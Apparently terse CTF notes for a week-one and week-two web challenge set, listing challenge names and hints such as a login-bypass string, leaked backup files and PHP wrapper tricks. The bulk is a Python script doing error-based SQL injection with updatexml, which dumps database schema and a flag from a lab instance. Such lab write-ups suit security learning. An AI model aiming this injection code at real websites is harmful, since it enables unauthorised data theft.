WEEK1-WEEK2
HTTP
GET/POST/Cookie
Head?Header!
User-Agent Referer
我真的会谢
.index.php.swp
www.zip
robots.txt
Word-For-You
1' or '1'='1
NotPHP
伪协议 弱比较 命令执行
Word-For-You 2
提示调试代码,尝试报错注入
import requests
url = 'http://39d8595b-85c2-4178-8a92-7968924a9dd5.node4.buuoj.cn:81/comments.php'
# payload = f'-- select group_concat(schema_name) from information_schema.schemata'
# payload = 'select group_concat(table_name) from information_schema.tables where table_schema="wfy"'
#~wfy_admin,wfy_comments,wfy_information'
# payload = 'select group_concat(column_name) from information_schema.columns where table_schema=\'wfy\' and table_name=\'wfy_comments\''
# ~id,text,user,name,display
payload = 'select (group_concat(0x7e,text)) from wfy.wfy_comments'
# ~flag{Ju4t_m2ke_some_err0rs}
data = {
# 'name': f'\'or/**/updatexml(1,concat(0x7e,({payload})),1)/**/or/**/\''
# 'name': f'\'or/**/updatexml(1,right(concat(0x7e,({payload})),16),1)/**/or/**/\''
'name': f'\'or/**/updatexml(1,right(concat(0x7e,({payload})),32),1)/**/or/**/\''
}
response = requests.post(url=url, data=data)
print(response.text)
UnserializeOne
入门的反序列化
IncludeOne
PHP伪随机数以伪协议利用
ezAPI
没玩过
查询
flag
Last updated